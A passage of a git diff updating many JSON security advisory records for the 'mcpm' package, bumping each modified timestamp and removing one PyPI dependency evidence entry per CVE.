b/advisories/BREW-mcpm-CVE-2025-53365.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-53365", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-j975-95f5-7wqh", "CVE-2025-53365", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "1.27.2", - "key": "pkg:pypi/mcp@1.27.2", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-53366.json b/advisories/BREW-mcpm-CVE-2025-53366.json index 67e652eb67a..ac5c6e03809 100644 --- a/advisories/BREW-mcpm-CVE-2025-53366.json +++ b/advisories/BREW-mcpm-CVE-2025-53366.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-53366", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-3qhf-m339-9g5v", "CVE-2025-53366", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "1.27.2", - "key": "pkg:pypi/mcp@1.27.2", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-54121.json b/advisories/BREW-mcpm-CVE-2025-54121.json index 9c133bfd7c2..72be0eb267b 100644 --- a/advisories/BREW-mcpm-CVE-2025-54121.json +++ b/advisories/BREW-mcpm-CVE-2025-54121.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-54121", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-2c2j-9gv5-cj73", "CVE-2025-54121", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-59420.json b/advisories/BREW-mcpm-CVE-2025-59420.json index a3994e3cfc3..beaf6a4138e 100644 --- a/advisories/BREW-mcpm-CVE-2025-59420.json +++ b/advisories/BREW-mcpm-CVE-2025-59420.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-59420", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-9ggr-2464-2j32", "CVE-2025-59420", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-61920.json b/advisories/BREW-mcpm-CVE-2025-61920.json index 1d946441f79..3aefa9eff13 100644 --- a/advisories/BREW-mcpm-CVE-2025-61920.json +++ b/advisories/BREW-mcpm-CVE-2025-61920.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-61920", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-pq5p-34cr-23v9", "CVE-2025-61920", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-62706.json b/advisories/BREW-mcpm-CVE-2025-62706.json index eb6d6759d9b..ac87970ece2 100644 --- a/advisories/BREW-mcpm-CVE-2025-62706.json +++ b/advisories/BREW-mcpm-CVE-2025-62706.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-62706", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-g7f3-828f-7h7m", "CVE-2025-62706", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-62727.json b/advisories/BREW-mcpm-CVE-2025-62727.json index 5d796e393cc..26eff293093 100644 --- a/advisories/BREW-mcpm-CVE-2025-62727.json +++ b/advisories/BREW-mcpm-CVE-2025-62727.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-62727", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-7f5h-v6xp-fcq8", "CVE-2025-62727", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-62800.json b/advisories/BREW-mcpm-CVE-2025-62800.json index 1a81fc83837..932f16ebbc2 100644 --- a/advisories/BREW-mcpm-CVE-2025-62800.json +++ b/advisories/BREW-mcpm-CVE-2025-62800.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-62800", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-mxxr-jv3v-6pgc", "CVE-2025-62800", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fastmcp", - "subject_version": "2.13.0", - "key": "pkg:pypi/fastmcp@2.13.0", - "resource": "fastmcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-62801.json b/advisories/BREW-mcpm-CVE-2025-62801.json index 62f154045fc..fc1d48f3613 100644 --- a/advisories/BREW-mcpm-CVE-2025-62801.json +++ b/advisories/BREW-mcpm-CVE-2025-62801.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-62801", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-rj5c-58rq-j5g5", "CVE-2025-62801", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fastmcp", - "subject_version": "2.13.0", - "key": "pkg:pypi/fastmcp@2.13.0", - "resource": "fastmcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-64340.json b/advisories/BREW-mcpm-CVE-2025-64340.json index 34f21291511..b365ee2cc9c 100644 --- a/advisories/BREW-mcpm-CVE-2025-64340.json +++ b/advisories/BREW-mcpm-CVE-2025-64340.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-64340", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-m8x7-r2rg-vh5g", "CVE-2025-64340", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fastmcp", - "subject_version": "2.13.0", - "key": "pkg:pypi/fastmcp@2.13.0", - "resource": "fastmcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-65015.json b/advisories/BREW-mcpm-CVE-2025-65015.json index a57b8278612..725230fe3f5 100644 --- a/advisories/BREW-mcpm-CVE-2025-65015.json +++ b/advisories/BREW-mcpm-CVE-2025-65015.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-65015", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-frfh-8v73-gjg4", "CVE-2025-65015", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "joserfc", - "subject_version": "1.7.1", - "key": "pkg:pypi/joserfc@1.7.1", - "resource": "joserfc" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-66221.json b/advisories/BREW-mcpm-CVE-2025-66221.json index ef10fc2a6f2..a885556f660 100644 --- a/advisories/BREW-mcpm-CVE-2025-66221.json +++ b/advisories/BREW-mcpm-CVE-2025-66221.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-66221", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-hgf8-39gv-g3f2", "CVE-2025-66221", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-66416.json b/advisories/BREW-mcpm-CVE-2025-66416.json index e1843fea304..4d9793ee7dc 100644 --- a/advisories/BREW-mcpm-CVE-2025-66416.json +++ b/advisories/BREW-mcpm-CVE-2025-66416.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-66416", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-9h52-p55h-vw2f", "CVE-2025-66416", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "1.27.2", - "key": "pkg:pypi/mcp@1.27.2", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-66418.json b/advisories/BREW-mcpm-CVE-2025-66418.json index bd8afced935..99047bddb02 100644 --- a/advisories/BREW-mcpm-CVE-2025-66418.json +++ b/advisories/BREW-mcpm-CVE-2025-66418.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-66418", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-gm62-xv2j-4w53", "CVE-2025-66418", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-66471.json b/advisories/BREW-mcpm-CVE-2025-66471.json index ec858221c45..671c8ae3761 100644 --- a/advisories/BREW-mcpm-CVE-2025-66471.json +++ b/advisories/BREW-mcpm-CVE-2025-66471.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-66471", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-2xpw-w6gg-jr37", "CVE-2025-66471", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-68158.json b/advisories/BREW-mcpm-CVE-2025-68158.json index 2769f457abf..1afc0b17816 100644 --- a/advisories/BREW-mcpm-CVE-2025-68158.json +++ b/advisories/BREW-mcpm-CVE-2025-68158.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-68158", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-fg6f-75jq-6523", "CVE-2025-68158", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-69196.json b/advisories/BREW-mcpm-CVE-2025-69196.json index b6ac0adb00b..c235cf3f510 100644 --- a/advisories/BREW-mcpm-CVE-2025-69196.json +++ b/advisories/BREW-mcpm-CVE-2025-69196.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-69196", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-5h2m-4q8j-pqpj", "CVE-2025-69196", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fastmcp", - "subject_version": "2.13.0", - "key": "pkg:pypi/fastmcp@2.13.0", - "resource": "fastmcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-69872.json b/advisories/BREW-mcpm-CVE-2025-69872.json index 3a8ec14d4f4..dec8cd800a6 100644 --- a/advisories/BREW-mcpm-CVE-2025-69872.json +++ b/advisories/BREW-mcpm-CVE-2025-69872.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-69872", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-w8v5-vhqr-4h9v", "CVE-2025-69872", @@ -38,14 +38,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "diskcache", - "subject_version": "5.6.3", - "key": "pkg:pypi/diskcache@5.6.3", - "resource": "diskcache" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-71176.json b/advisories/BREW-mcpm-CVE-2025-71176.json index d8072880209..cddd5389762 100644 --- a/advisories/BREW-mcpm-CVE-2025-71176.json +++ b/advisories/BREW-mcpm-CVE-2025-71176.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-71176", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-6w46-j5rx-g56g", "CVE-2025-71176", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pytest", - "subject_version": "9.1.1", - "key": "pkg:pypi/pytest@9.1.1", - "resource": "pytest" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-21441.json b/advisories/BREW-mcpm-CVE-2026-21441.json index 5c57f5cd785..99f858ea4d8 100644 --- a/advisories/BREW-mcpm-CVE-2026-21441.json +++ b/advisories/BREW-mcpm-CVE-2026-21441.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-21441", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-38jv-5279-wg99", "CVE-2026-21441", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-21860.json b/advisories/BREW-mcpm-CVE-2026-21860.json index ef453efde60..5b0f70445ac 100644 --- a/advisories/BREW-mcpm-CVE-2026-21860.json +++ b/advisories/BREW-mcpm-CVE-2026-21860.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-21860", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-87hc-h4r5-73f7", "CVE-2026-21860", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-23949.json b/advisories/BREW-mcpm-CVE-2026-23949.json index bead3955f36..0c0b36176e0 100644 --- a/advisories/BREW-mcpm-CVE-2026-23949.json +++ b/advisories/BREW-mcpm-CVE-2026-23949.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-23949", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-58pv-8j8x-9vj2", "CVE-2026-23949", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "jaraco-context", - "subject_version": "6.1.2", - "key": "pkg:pypi/jaraco-context@6.1.2", - "resource": "jaraco-context" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-24486.json b/advisories/BREW-mcpm-CVE-2026-24486.json index 3059cfecf07..7e71607a019 100644 --- a/advisories/BREW-mcpm-CVE-2026-24486.json +++ b/advisories/BREW-mcpm-CVE-2026-24486.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-24486", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-wp53-j4wj-2cfg", "CVE-2026-24486", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-25645.json b/advisories/BREW-mcpm-CVE-2026-25645.json index c4227379a22..bc85abfa407 100644 --- a/advisories/BREW-mcpm-CVE-2026-25645.json +++ b/advisories/BREW-mcpm-CVE-2026-25645.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-25645", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-gc5v-m9x4-r6x2", "CVE-2026-25645", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-27124.json b/advisories/BREW-mcpm-CVE-2026-27124.json index d6db13729d9..deac75f1f20 100644 --- a/advisories/BREW-mcpm-CVE-2026-27124.json +++ b/advisories/BREW-mcpm-CVE-2026-27124.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-27124", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-rww4-4w9c-7733", "CVE-2026-27124", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fastmcp", - "subject_version": "2.13.0", - "key": "pkg:pypi/fastmcp@2.13.0", - "resource": "fastmcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-27199.json b/advisories/BREW-mcpm-CVE-2026-27199.json index b8b4a38f0a4..af91ca82bb9 100644 --- a/advisories/BREW-mcpm-CVE-2026-27199.json +++ b/advisories/BREW-mcpm-CVE-2026-27199.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-27199", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-29vq-49wr-vm6x", "CVE-2026-27199", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-27932.json b/advisories/BREW-mcpm-CVE-2026-27932.json index 680fb2de111..a111d3a6135 100644 --- a/advisories/BREW-mcpm-CVE-2026-27932.json +++ b/advisories/BREW-mcpm-CVE-2026-27932.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-27932", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-w5r5-m38g-f9f9", "CVE-2026-27932", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "joserfc", - "subject_version": "1.7.1", - "key": "pkg:pypi/joserfc@1.7.1", - "resource": "joserfc" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-27962.json b/advisories/BREW-mcpm-CVE-2026-27962.json index 2b2396f803e..0825376f165 100644 --- a/advisories/BREW-mcpm-CVE-2026-27962.json +++ b/advisories/BREW-mcpm-CVE-2026-27962.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-27962", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-wvwj-cvrp-7pv5", "CVE-2026-27962", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-28490.json b/advisories/BREW-mcpm-CVE-2026-28490.json index 4962c80a6e0..74f57a3c0ee 100644 --- a/advisories/BREW-mcpm-CVE-2026-28490.json +++ b/advisories/BREW-mcpm-CVE-2026-28490.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-28490", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-7432-952r-cw78", "CVE-2026-28490", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-28498.json b/advisories/BREW-mcpm-CVE-2026-28498.json index 98912511aa2..2b9f271f323 100644 --- a/advisories/BREW-mcpm-CVE-2026-28498.json +++ b/advisories/BREW-mcpm-CVE-2026-28498.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-28498", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-m344-f55w-2m6j", "CVE-2026-28498", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-28684.json b/advisories/BREW-mcpm-CVE-2026-28684.json index 0c9b26986b0..4ffe62b76d6 100644 --- a/advisories/BREW-mcpm-CVE-2026-28684.json +++ b/advisories/BREW-mcpm-CVE-2026-28684.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-28684", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-mf9w-mj56-hr94", "CVE-2026-28684", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-dotenv", - "subject_version": "1.2.2", - "key": "pkg:pypi/python-dotenv@1.2.2", - "resource": "python-dotenv" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-28802.json b/advisories/BREW-mcpm-CVE-2026-28802.json index b7a868b995d..d44a3f64d03 100644 --- a/advisories/BREW-mcpm-CVE-2026-28802.json +++ b/advisories/BREW-mcpm-CVE-2026-28802.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-28802", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-7wc2-qxgw-g8gg", "CVE-2026-28802", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-32597.json b/advisories/BREW-mcpm-CVE-2026-32597.json index 2d5a57755a3..b4e835e74d9 100644 --- a/advisories/BREW-mcpm-CVE-2026-32597.json +++ b/advisories/BREW-mcpm-CVE-2026-32597.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-32597", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-752w-5fwx-jx9f", "CVE-2026-32597", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-32871.json b/advisories/BREW-mcpm-CVE-2026-32871.json index 5fde0598e97..53ebb2e2aef 100644 --- a/advisories/BREW-mcpm-CVE-2026-32871.json +++ b/advisories/BREW-mcpm-CVE-2026-32871.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2026-32871", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-vv7q-7jx5-f767", "CVE-2026-32871", @@ -39,14 +39,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "fastmcp", - "subject_version": "2.13.0", - "key": "pkg:pypi/fastmcp@2.13.0", - "resource": "fastmcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2026-40347.json b/advisories/BREW-mcpm-CVE-2026-40347.json index d14df86c426..288106a776d 100644 --- a/advisories/BREW-mcpm-CVE-2026-40347.json +++ b/advisories/BREW-mcpm-CVE-2026-40347.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": 